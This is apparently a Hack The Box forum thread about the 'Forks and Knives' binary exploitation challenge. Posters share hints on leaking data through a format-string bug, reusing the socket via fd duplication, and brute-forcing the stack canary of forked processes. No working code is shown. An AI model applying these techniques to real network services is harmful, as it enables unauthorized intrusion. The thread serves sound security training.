Official discussion thread for Forks and Knives. Please do not post any spoilers or big hints.
Very enjoyable challenge and I gained some new things
I’m having issues finding a way to leak anything from the program. I see a few possibilities but no way to get there reliably.
review carefully the process by which your input is output !
more hint: the process by which your input is printed to the file
Everything works locally but when I switch to the HTB instance nothing works. Am I supposed to get a reverse shell, or read the flag and punt it over the socket? EDIT: by locally I mean the docker image.
A reverse shell is possible, but there is a different technique you can use that utilizes the existing socket. socket reuse or fd-dup.
Very good challenge. I managed to solve it, but I have a local issue I don’t understand. Remotely, I can connect as many times as I want without any problems. But locally, I can’t. Even though I close all the connections before making another one, I can only make a limited number of connections. After that, it gets stuck. Does anyone know what I might be doing wrong?
I’ve made good progress and have 90% of the exploit put together, but can’t seem to work around one of the mitigations because I can’t seem to leak a particular value. Is it possible to build an arbitrary read primitive or do I need to get creative and use my existing leak?
how to leak the canry by the format only 4 bytes?
got it, a fork process is the same canary with parent;so we can burte force the canary;
Brute forcing is really the solution here? That is somewhat disappointing
[type or paste code here](https://book.jorianwoltjer.com/binary-exploitation/stack-canaries)